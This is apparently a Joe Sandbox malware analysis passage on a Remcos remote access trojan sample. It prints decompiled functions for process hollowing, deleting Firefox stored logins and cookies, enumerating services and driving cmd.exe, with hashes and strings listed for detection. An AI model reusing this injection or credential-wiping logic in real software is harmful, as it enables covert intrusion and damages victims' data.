Part of subcall function 0042EDF6: __onexit.LIBCMT ref: 0042EDFC

WriteFile.KERNEL32(00000000,00000000,?,00000000,0046C2D0,Function_0005F6C8,00000062,Function_0005F6AC), ref: 004058E5
Sleep.KERNEL32(00000064,00000062,Function_0005F6AC), ref: 004058FE
TerminateProcess.KERNEL32(00000000), ref: 00405917
CloseHandle.KERNEL32 ref: 00405923
CloseHandle.KERNEL32 ref: 0040592F
CloseHandle.KERNEL32 ref: 00405945
CloseHandle.KERNEL32 ref: 00405951

Strings

SystemDrive, xrefs: 00405662
cmd.exe, xrefs: 0040564E

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: SystemDrive$cmd.exe
API String ID: 2994406822-3633465311
Opcode ID: a619728b219a5a2a37fad6ac12b4fb9371bcedb7351a108698611445f816e513
Instruction ID: 36aeaf24663ea89ca73ce0651989de9eb03545aec66eda9801f6c68c010dee92
Opcode Fuzzy Hash: a619728b219a5a2a37fad6ac12b4fb9371bcedb7351a108698611445f816e513
Instruction Fuzzy Hash: 1391B371F00208ABD714BB669D4696E3B69EB45714B10407FF901B72E2EFB88D01DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00413ACA, Relevance: 27.2, APIs: 18, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00413ACA(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4) {
				void _v8;
				signed int _v12;
				void* _v16;
				CONTEXT* _v20;
				WCHAR* _v24;
				struct _STARTUPINFOW _v92;
				void* __edi;
				void* _t58;
				void* _t72;
				void* _t73;
				int _t83;
				intOrPtr* _t95;
				void* _t98;
				signed int _t102;
				void* _t104;
				void* _t106;
				CONTEXT* _t110;
				void* _t113;
				CONTEXT* _t114;
				struct _PROCESS_INFORMATION* _t116;

				_v8 = _v8 & 0x00000000;
				_v16 = __edx;
				_v24 = __ecx;
				if( *__edx == 0x5a4d) {
					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
					if( *_t95 == 0x4550) {
						_push(_t106);
						E00431810(_t106,  &_v92, 0, 0x44);
						_t116 = _a4;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						if(CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116) == 0) {
							L21:
							_t58 = 0;
							L22:
							L23:
							return _t58;
						}
						CloseHandle(_v92.hStdInput);
						CloseHandle(_v92.hStdOutput);
						CloseHandle(_v92.hStdError);
						_t110 = VirtualAlloc(0, 4, 0x1000, 4);
						_v20 = _t110;
						_t110->ContextFlags = 0x10007;
						_t14 =  &(_t116->hThread); // 0xffffdcf2
						if(GetThreadContext( *_t14, _t110) == 0 || ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0) == 0) {
							L20:
							TerminateProcess(_t116->hProcess, 0);
							CloseHandle(_t116->hProcess);
							_t50 =  &(_t116->hThread); // 0xffffdcf2
							CloseHandle( *_t50);
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							goto L21;
						} else {
							_t72 = _v8;
							if(_t72 ==  *(_t95 + 0x34)) {
								NtUnmapViewOfSection(_t116->hProcess, _t72);
							}
							_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40);
							_v24 = _t73;
							if(_t73 == 0) {
								goto L20;
							} else {
								_t113 = _v16;
								if(WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0) == 0) {
									goto L20;
								}
								_v12 = _v12 & 0x00000000;
								if(0 >=  *(_t95 + 6)) {
									L14:
									_t98 = _t95 + 0x34;
									_t114 = _v20;
									if(_v8 ==  *_t98) {
										L17:
										_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
										_t48 =  &(_t116->hThread); // 0xffffdcf2
										if(SetThreadContext( *_t48, _t114) == 0) {
											goto L20;
										}
										_t49 =  &(_t116->hThread); // 0xffffdcf2
										if(ResumeThread( *_t49) == 0xffffffff) {
											goto L20;
										}
										_t58 = 1;
										goto L22;
									}
									_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0);
									if(_t83 != 0) {
										goto L17;
									}
									TerminateProcess(_t116->hProcess, _t83);
									goto L21;
								}
								_t104 = 0;
								_v16 = 0;
								do {
									_t28 = _t113 + 0x3c; // 0x83ffc983
									WriteProcessMemory( *_t116,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x10c)) + _t113,  *( *_t28 + _t104 + _t113 + 0x108), 0);
									_t102 = _v12 + 1;
									_t104 = _v16 + 0x28;
									_v12 = _t102;
									_v16 = _t104;
								} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
								goto L14;
							}
						}
					}
					_t58 = 0;
					goto L23;
				}
				return 0;
			}

0x00413ad0
0x00413ad9
0x00413adc
0x00413ae2
0x00413aef
0x00413af7
0x00413b01
0x00413b0a
0x00413b0f
0x00413b19
0x00413b1b
0x00413b1c
0x00413b1d
0x00413b37
0x00413cc1
0x00413cc1
0x00413cc3
0x00413cc5
0x00000000
0x00413cc5
0x00413b46
0x00413b4b
0x00413b50
0x00413b63
0x00413b66
0x00413b69
0x00413b6f
0x00413b7a
0x00413ca0
0x00413ca4
0x00413cb2
0x00413cb4
0x00413cb7
0x00413cbd
0x00413cbe
0x00413cbf
0x00413cc0
0x00000000
0x00413ba2
0x00413ba2
0x00413ba8
0x00413bad
0x00413bad
0x00413bc2
0x00413bc8
0x00413bcd
0x00000000
0x00413bd3
0x00413bd3
0x00413be7
0x00000000
0x00000000
0x00413bed
0x00413bf7
0x00413c41
0x00413c44
0x00413c47
0x00413c4c
0x00413c74
0x00413c7b
0x00413c81
0x00413c8c
0x00000000
0x00000000
0x00413c8e
0x00413c9a
0x00000000
0x00000000
0x00413c9c
0x00000000
0x00413c9c
0x00413c5f
0x00413c67
0x00000000
0x00000000
0x00413c6c
0x00000000
0x00413c6c
0x00413bf9
0x00413bfb
0x00413bfe
0x00413bfe
0x00413c23
0x00413c2f
0x00413c34
0x00413c37
0x00413c3a
0x00413c3d
0x00000000
0x00413bfe
0x00413bcd
0x00413b7a
0x00413af9
0x00000000
0x00413af9
0x00000000

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b01fafe3024c135bf2856ef8dfe9e93d90ddea8f69566f42c941dfb6bfd97822
Instruction ID: bbd19ceeb5de074bceafc2ad491a45c1a0c1387eac9ecb65e4147fd8eb7bbb52
Opcode Fuzzy Hash: b01fafe3024c135bf2856ef8dfe9e93d90ddea8f69566f42c941dfb6bfd97822
Instruction Fuzzy Hash: EA519D71600604FFEB108FA5CC45FAABBB9FF44742F104065F644E62A1E735EA90DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3AF, Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040A3AF(void* __ebx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAA _v468;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t58;
				signed int _t59;
				signed int _t73;
				signed int _t75;
				char* _t108;
				signed int _t109;
				char* _t129;
				void* _t130;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;

				_t142 = __eflags;
				_t134 = __edi;
				_t89 = __ebx;
				E004020B5(__ebx,  &_v100);
				E004020B5(__ebx,  &_v76);
				E004020B5(__ebx,  &_v28);
				_t45 = E00402064(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				L00401FB1( &_v28, _t46, _t135, E004075C4(_t89,  &_v52, E0043919A(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
				L00401FA7();
				L00401FA7();
				_t128 =  &_v28;
				_t136 = FindFirstFileA(L00401F75(E0040755A( &_v124,  &_v28, _t142, "*")),  &_v468);
				L00401FA7();
				_t143 = _t136 - 0xffffffff;
				if(_t136 != 0xffffffff) {
					while(1) {
						L15:
						__eflags = FindNextFileA(_t136,  &_v468);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v468.dwFileAttributes & 0x00000010;
						if((_v468.dwFileAttributes & 0x00000010) == 0) {
							continue;
						}
						_t108 =  &(_v468.cFileName);
						__eflags =  *_t108 - 0x2e;
						if( *_t108 != 0x2e) {
							L5:
							_t129 =  &(_v468.cFileName);
							_t109 = 0;
							__eflags = 0;
							while(1) {
								_t58 =  *(_t129 + _t109) & 0x000000ff;
								_t130 = "..";
								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
								_t128 =  &(_v468.cFileName);
								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
									break;
								}
								_t109 = _t109 + 1;
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									continue;
								}
								_t59 = 0;
								L10:
								__eflags = _t59;
								if(__eflags != 0) {
									L00401FB1( &_v100, _t61, _t136, E0040530D(_t89,  &_v52, E0040755A( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
									L00401FA7();
									L00401FA7();
									_t128 = E0040755A( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
									L00401FB1( &_v76, _t67, _t136, E0040530D(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
									L00401FA7();
									L00401FA7();
									_t73 = DeleteFileA(L00401F75( &_v100));
									__eflags = _t73;
									if(_t73 == 0) {
										GetLastError();
									}
									_t75 = DeleteFileA(L00401F75( &_v76));
									__eflags = _t75;
									if(_t75 == 0) {
										GetLastError();
									}
								}
								goto L15;
							}
							asm("sbb eax, eax");
							_t59 = _t58 | 0x00000001;
							__eflags = _t59;
							goto L10;
						}
						__eflags =  *(_t108 + 1) & 0x000000ff;
						if(( *(_t108 + 1) & 0x000000ff) == 0) {
							continue;
						}
						goto L5;
					}
					E00402064(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
					E0040AA8C(_t89, _t128, __eflags);
					FindClose(_t136);
					goto L17;
				} else {
					FindClose(_t136);
					E00402064(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
					E0040AA8C(_t89,  &_v28, _t143);
					L17:
					L00401FA7();
					L00401FA7();
					L00401FA7();
					return 1;
				}
			}

0x0040a3af
0x0040a3af
0x0040a3af
0x0040a3bc
0x0040a3c4
0x0040a3cc
0x0040a3d9
0x0040a3f9
0x0040a401
0x0040a409
0x0040a41a
0x0040a437
0x0040a439
0x0040a43e
0x0040a441
0x0040a577
0x0040a577
0x0040a585
0x0040a587
0x00000000
0x00000000
0x0040a46a
0x0040a471
0x00000000
0x00000000
0x0040a477
0x0040a47d
0x0040a480
0x0040a48e
0x0040a48e
0x0040a494
0x0040a494
0x0040a496
0x0040a496
0x0040a49a
0x0040a49f
0x0040a4a2
0x0040a4a8
0x00000000
0x00000000
0x0040a4aa
0x0040a4ab
0x0040a4ae
0x00000000
0x00000000
0x0040a4b0
0x0040a4b9
0x0040a4b9
0x0040a4bb
0x0040a4eb
0x0040a4f3
0x0040a4fe
0x0040a51b
0x0040a52d
0x0040a538
0x0040a540
0x0040a54e
0x0040a554
0x0040a556
0x0040a558
0x0040a558
0x0040a567
0x0040a56d
0x0040a56f
0x0040a571
0x0040a571
0x0040a56f
0x00000000
0x0040a4bb
0x0040a4b4
0x0040a4b6
0x0040a4b6
0x00000000
0x0040a4b6
0x0040a486
0x0040a488
0x00000000
0x00000000
0x00000000
0x0040a488
0x0040a597
0x0040a59c
0x0040a5a5
0x00000000
0x0040a447
0x0040a448
0x0040a458
0x0040a45d
0x0040a5ab
0x0040a5ae
0x0040a5b6
0x0040a5be
0x0040a5c9
0x0040a5c9

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A42E
FindClose.KERNEL32(00000000), ref: 0040A448
FindNextFileA.KERNEL32(00000000,?), ref: 0040A57F
FindClose.KERNEL32(00000000), ref: 0040A5A5

Strings

[Firefox StoredLogins Cleared!], xrefs: 0040A592
\key3.db, xrefs: 0040A509
[Firefox StoredLogins not found], xrefs: 0040A453
\logins.json, xrefs: 0040A4C7
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040A3D1
UserProfile, xrefs: 0040A3DF

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: 55332c04666dcd141e12f9f9d293b950890d0235c69d3ad775c2ab6c8834e8cc
Instruction ID: fceb70f3503f9a85c82f74107e9b35daee5a72393052f256031c89f00bf2afe6
Opcode Fuzzy Hash: 55332c04666dcd141e12f9f9d293b950890d0235c69d3ad775c2ab6c8834e8cc
Instruction Fuzzy Hash: 22513C309102195ACB14FBB1DC5AEEEB774AF11309F50017FE406B60E2EF7C5A49CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5CA, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040A5CA(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				struct _WIN32_FIND_DATAA _v444;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t35;
				signed int _t56;
				signed int _t57;
				long _t68;
				char* _t92;
				signed int _t93;
				void* _t102;
				char* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t116 = __eflags;
				_t108 = __edi;
				E004020B5(0,  &_v52);
				E004020B5(0,  &_v28);
				_t35 = E00402064(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				L00401FB1( &_v28, _t36, _t109, E004075C4(0,  &_v76, E0043919A(0, __eflags, "UserProfile"), _t108, _t116, _t35));
				L00401FA7();
				L00401FA7();
				_t104 =  &_v28;
				_t110 = FindFirstFileA(L00401F75(E0040755A( &_v100,  &_v28, _t116, "*")),  &_v444);
				L00401FA7();
				_t117 = _t110 - 0xffffffff;
				if(_t110 != 0xffffffff) {
					__eflags = FindNextFileA(_t110,  &_v444);
					if(__eflags == 0) {
						L17:
						E00402064(0, _t111 - 0x18, "\n[Firefox Cookies not found]");
						E0040AA8C(0, _t104, __eflags);
						FindClose(_t110);
						goto L18;
					} else {
						__eflags = 0;
						do {
							__eflags = _v444.dwFileAttributes & 0x00000010;
							if((_v444.dwFileAttributes & 0x00000010) == 0) {
								goto L16;
							} else {
								_t92 =  &(_v444.cFileName);
								__eflags =  *_t92 - 0x2e;
								if( *_t92 != 0x2e) {
									L8:
									_t105 =  &(_v444.cFileName);
									_t93 = 0;
									while(1) {
										_t56 =  *(_t105 + _t93) & 0x000000ff;
										_t106 = "..";
										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
										_t104 =  &(_v444.cFileName);
										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
											break;
										}
										_t93 = _t93 + 1;
										__eflags = _t93 - 3;
										if(_t93 != 3) {
											continue;
										} else {
											_t57 = 0;
										}
										L13:
										__eflags = _t57;
										if(__eflags == 0) {
											goto L16;
										} else {
											_t104 = E0040755A( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
											L00401FB1( &_v52, _t59, _t110, E0040530D(0,  &_v76, _t59, _t108, __eflags, "\\cookies.sqlite"));
											L00401FA7();
											L00401FA7();
											__eflags = DeleteFileA(L00401F75( &_v52));
											if(__eflags != 0) {
												_t102 = _t111 - 0x18;
												_push("\n[Firefox cookies found, cleared!]");
												goto L2;
											} else {
												_t68 = GetLastError();
												__eflags = _t68 != 0;
												if(_t68 != 0) {
													FindClose(_t110);
												} else {
													goto L16;
												}
											}
										}
										goto L19;
									}
									asm("sbb eax, eax");
									_t57 = _t56 | 0x00000001;
									__eflags = _t57;
									goto L13;
								} else {
									__eflags =  *(_t92 + 1) & 0x000000ff;
									if(( *(_t92 + 1) & 0x000000ff) == 0) {
										goto L16;
									} else {
										goto L8;
									}
								}
							}
							goto L19;
							L16:
							__eflags = FindNextFileA(_t110,  &_v444);
						} while (__eflags != 0);
						goto L17;
					}
				} else {
					FindClose(_t110);
					_t102 = _t111 - 0x18;
					_push("\n[Firefox Cookies not found]");
					L2:
					E00402064(0, _t102);
					E0040AA8C(0, _t104, _t117);
					L18:
				}
				L19:
				L00401FA7();
				L00401FA7();
				return 1;
			}

0x0040a5ca
0x0040a5ca
0x0040a5d8
0x0040a5e0
0x0040a5ed
0x0040a60d
0x0040a615
0x0040a61d
0x0040a62e
0x0040a64b
0x0040a64d
0x0040a652
0x0040a655
0x0040a688
0x0040a68a
0x0040a756
0x0040a760
0x0040a765
0x0040a76e
0x00000000
0x0040a690
0x0040a690
0x0040a692
0x0040a692
0x0040a699
0x00000000
0x0040a69f
0x0040a69f
0x0040a6a5
0x0040a6a8
0x0040a6b6
0x0040a6b6
0x0040a6bc
0x0040a6be
0x0040a6be
0x0040a6c2
0x0040a6c7
0x0040a6ca
0x0040a6d0
0x00000000
0x00000000
0x0040a6d2
0x0040a6d3
0x0040a6d6
0x00000000
0x0040a6d8
0x0040a6d8
0x0040a6d8
0x0040a6e1
0x0040a6e1
0x0040a6e3
0x00000000
0x0040a6e5
0x0040a6fd
0x0040a70c
0x0040a714
0x0040a71c
0x0040a730
0x0040a732
0x0040a79a
0x0040a79c
0x00000000
0x0040a734
0x0040a734
0x0040a73b
0x0040a73e
0x0040a78f
0x00000000
0x00000000
0x00000000
0x0040a73e
0x0040a732
0x00000000
0x0040a6e3
0x0040a6dc
0x0040a6de
0x0040a6de
0x00000000
0x0040a6aa
0x0040a6ae
0x0040a6b0
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a6b0
0x0040a6a8
0x00000000
0x0040a740
0x0040a74e
0x0040a74e
0x00000000
0x0040a692
0x0040a657
0x0040a658
0x0040a661
0x0040a663
0x0040a668
0x0040a668
0x0040a66d
0x0040a774
0x0040a774
0x0040a776
0x0040a779
0x0040a781
0x0040a78d

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A642
FindClose.KERNEL32(00000000), ref: 0040A658
FindNextFileA.KERNEL32(00000000,?), ref: 0040A682
DeleteFileA.KERNEL32(00000000,00000000), ref: 0040A72A
GetLastError.KERNEL32 ref: 0040A734
FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A748
FindClose.KERNEL32(00000000), ref: 0040A76E
FindClose.KERNEL32(00000000), ref: 0040A78F

Strings

\cookies.sqlite, xrefs: 0040A6EB
[Firefox cookies found, cleared!], xrefs: 0040A79C
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040A5E5
[Firefox Cookies not found], xrefs: 0040A663, 0040A75B
UserProfile, xrefs: 0040A5F3

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Find$File$Close$Next$DeleteErrorFirstLast
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 532992503-432212279
Opcode ID: 8056499cd48c947665f8e8d2a1d435cf0245da0fca2ec53c908143d9a56c817d
Instruction ID: a0e0b87e43e1ffccf28ad4a7bbdc78d64d502d6bba83e6bf3342b17ddf37f993
Opcode Fuzzy Hash: 8056499cd48c947665f8e8d2a1d435cf0245da0fca2ec53c908143d9a56c817d
Instruction Fuzzy Hash: 32417C309002196ACB14FB75CC569EE7738AF11305F50417BE805B71D2EF3D9A4ACA9A

Uniqueness

Uniqueness Score: -1.00%

Function 00415A7A, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 226
serviceCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00415A7A(intOrPtr __ecx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				struct _QUERY_SERVICE_CONFIG* _v24;
				void* _v28;
				intOrPtr _v32;
				short** _v36;
				intOrPtr _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				struct _ENUM_SERVICE_STATUS _v172;
				void* __ebx;
				void* __edi;
				struct _ENUM_SERVICE_STATUS* _t87;
				void* _t100;
				void* _t107;
				int _t108;
				long _t110;
				void* _t133;
				intOrPtr _t198;
				short** _t199;
				int _t201;
				intOrPtr _t202;
				int _t203;

				_t198 = __ecx;
				_v40 = __ecx;
				_t133 = OpenSCManagerA(0, 0, 4);
				if(_t133 != 0) {
					L00401F4D(_t133,  &_v88);
					_v12 = 0;
					_t5 =  &_v8; // 0x41557b
					_v8 = 0;
					_v20 = 0;
					__eflags = EnumServicesStatusW(_t133, 0x3b, 3,  &_v172, 0,  &_v12, _t5,  &_v20);
					if(__eflags != 0) {
						L12:
						CloseServiceHandle(_t133);
						E004032FA(_t133, _t198, __eflags,  &_v88);
						L00401ED0();
						L13:
						return _t198;
					}
					__eflags = GetLastError() - 0xea;
					if(__eflags != 0) {
						goto L12;
					}
					_t201 = _v12;
					_push(_t201);
					_t87 = L00438E06( &_v88);
					_v36 = _t87;
					_t13 =  &_v8; // 0x41557b
					EnumServicesStatusW(_t133, 0x3b, 3, _t87, _t201,  &_v12, _t13,  &_v20);
					_t202 = 0;
					_v32 = 0;
					__eflags = _v8;
					if(__eflags <= 0) {
						L11:
						L00438E01(_v36);
						goto L12;
					}
					_t199 = _v36;
					do {
						E004032F1(E004043E5(_t133,  &_v112, _t199[1], __eflags, E0040425F(_t133,  &_v64, 0x4659b4)));
						L00401ED0();
						L00401ED0();
						E004032F1(E004043E5(_t133,  &_v64,  *_t199, __eflags, E0040425F(_t133,  &_v112, 0x4659b4)));
						L00401ED0();
						L00401ED0();
						_t100 = E0040425F(_t133,  &_v136, 0x4659b4);
						E004032F1(E00403010( &_v64, L00416BF7(_t133,  &_v112, _t199[3]), _t100));
						L00401ED0();
						L00401ED0();
						L00401ED0();
						_v16 = _v16 & 0x00000000;
						_t107 = OpenServiceW(_t133,  *_t199, 1);
						_v28 = _t107;
						_t108 = QueryServiceConfigW(_t107, _v24, 0,  &_v16);
						__eflags = _t108;
						if(_t108 == 0) {
							_t110 = GetLastError();
							__eflags = _t110 - 0x7a;
							if(_t110 == 0x7a) {
								_t203 = _v16;
								_push(_t203);
								_v24 = L00438E06( &_v16);
								_t204 = _v24;
								QueryServiceConfigW(_v28, _v24, _t203,  &_v16);
								E004032F1(E00403086(_t133,  &_v136, L00416BF7(_t133,  &_v64,  *_v24), _t199, __eflags, 0x4659b4));
								L00401ED0();
								L00401ED0();
								E004032F1(E00403086(_t133,  &_v136, L00416BF7(_t133,  &_v64,  *((intOrPtr*)(_t204 + 4))), _t199, __eflags, 0x4659b4));
								L00401ED0();
								L00401ED0();
								E004032F1(E00403086(_t133,  &_v136, E004043E5(_t133,  &_v64,  *((intOrPtr*)(_t204 + 0xc)), __eflags, E0040425F(_t133,  &_v112, 0x4659b4)), _t199, __eflags, "\n"));
								L00401ED0();
								L00401ED0();
								L00401ED0();
								L00438E01(_t204);
								_t202 = _v32;
							}
						}
						CloseServiceHandle(_v28);
						_t202 = _t202 + 1;
						_t199 =  &(_t199[9]);
						_v32 = _t202;
						_t69 =  &_v8; // 0x41557b
						__eflags = _t202 -  *_t69;
					} while (__eflags < 0);
					_t198 = _v40;
					goto L11;
				}
				E0040425F(_t133, _t198,  &E0045F714);
				goto L13;
			}

0x00415a8a
0x00415a8e
0x00415a97
0x00415a9b
0x00415ab1
0x00415ab9
0x00415abd
0x00415ac0
0x00415ac7
0x00415ade
0x00415ae0
0x00415d29
0x00415d2a
0x00415d36
0x00415d3e
0x00415d43
0x00415d4b
0x00415d4b
0x00415aec
0x00415af1
0x00000000
0x00000000
0x00415af7
0x00415afa
0x00415afb
0x00415b04
0x00415b08
0x00415b17
0x00415b1d
0x00415b1f
0x00415b22
0x00415b25
0x00415d20
0x00415d23
0x00000000
0x00415d28
0x00415b2b
0x00415b2e
0x00415b4c
0x00415b54
0x00415b5c
0x00415b7e
0x00415b86
0x00415b8e
0x00415b9e
0x00415bbe
0x00415bc6
0x00415bce
0x00415bd9
0x00415bde
0x00415be7
0x00415bf0
0x00415bfa
0x00415c00
0x00415c02
0x00415c08
0x00415c0e
0x00415c11
0x00415c17
0x00415c1a
0x00415c21
0x00415c29
0x00415c30
0x00415c57
0x00415c62
0x00415c6a
0x00415c91
0x00415c9c
0x00415ca4
0x00415cda
0x00415ce5
0x00415ced
0x00415cf5
0x00415cfb
0x00415d00
0x00415d03
0x00415c11
0x00415d07
0x00415d0d
0x00415d0e
0x00415d11
0x00415d14
0x00415d14
0x00415d14
0x00415d1d
0x00000000
0x00415d1d
0x00415aa4
0x00000000

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,0046BACC,0046C980), ref: 00415A91
EnumServicesStatusW.ADVAPI32 ref: 00415AD8
GetLastError.KERNEL32(?,0046BACC,0046C980), ref: 00415AE6
EnumServicesStatusW.ADVAPI32 ref: 00415B17
OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,004659B4,00000000,004659B4,00000000,004659B4,?,0046BACC,0046C980), ref: 00415BE7

Strings

{UA, xrefs: 00415ABD, 00415B08, 00415D14, 00415AC3, 00415B0B

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: EnumOpenServicesStatus$ErrorLastManagerService
String ID: {UA
API String ID: 2247270020-1643284148
Opcode ID: e87736615fc9eb3f325040b3cbb7a6685d8f6974ef4ed551a9d03dcca7d44b65
Instruction ID: 2ada6be536c103ea9e2eb214abc328ada890e6f3689920fc5719b35e93efa4c7
Opcode Fuzzy Hash: e87736615fc9eb3f325040b3cbb7a6685d8f6974ef4ed551a9d03dcca7d44b65
Instruction Fuzzy Hash: E9816071D00208ABCB14EB92DC569EEB739EF54345F10806EF516B61E1EF386B49CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1AD, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 186
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040D1AD(void* __eflags, char _a4) {
				void* _v8;
				char _v32;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v96;
				char _v120;
				char _v648;
				intOrPtr _v676;
				void* _v684;
				short _v1204;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t76;
				struct _SECURITY_ATTRIBUTES* _t106;
				char* _t111;
				void* _t158;
				void* _t161;

				_t106 = 0;
				GetModuleFileNameW(0,  &_v1204, 0x104);
				_t149 = "1";
				if(E00407746("1") != 0) {
					L14:
					L00401EDA( &_a4, _t149, _t159, E00416773(_t106,  &_v120, _t149));
					_t111 =  &_v120;
					L00401ED0();
					if(L00416F6C(_t111) != 0) {
						_push(_t111);
						if(E0040D84F( &_a4, L"Program Files\\") != 0xffffffff) {
							E0040D870(_t106,  &_a4, _t157, _t73, 0xe, L"Program Files (x86)\\");
						}
					}
					if(L0040EE85( &_v1204,  &_a4) != 0) {
						L22:
						L00401ED0();
						return _t106;
					} else {
						L18:
						_t158 = CreateMutexA(_t106, 1, "Remcos_Mutex_Inj");
						E004020B5(_t106,  &_v96);
						E00417334(L00401ECB(0x46c500),  &_v96);
						L00401F75( &_v96);
						if(L00413CCA(L00401ECB( &_a4)) == 0) {
							CloseHandle(_t158);
						} else {
							_t106 = 1;
							E004105A0(0x46c518, L00401F75(0x46c518), "Inj", 1);
						}
						L00401FA7();
						goto L22;
					}
				}
				L00401F4D(0,  &_v32);
				_t76 = CreateToolhelp32Snapshot(2, 0);
				_v8 = _t76;
				_v684 = 0x22c;
				Process32FirstW(_t76,  &_v684);
				while(Process32NextW(_v8,  &_v684) != 0) {
					E0040425F(_t106,  &_v56,  &_v648);
					_t157 = E004022EA( &_v56,  &_v60);
					_t159 = E004022AD( &_v56,  &_v64);
					E00408228( &_v72,  *((intOrPtr*)(E004022EA( &_v56,  &_v68))),  *_t84,  *_t82);
					_t161 = _t161 + 0xc;
					if(L00409EAE( &_a4) != 0) {
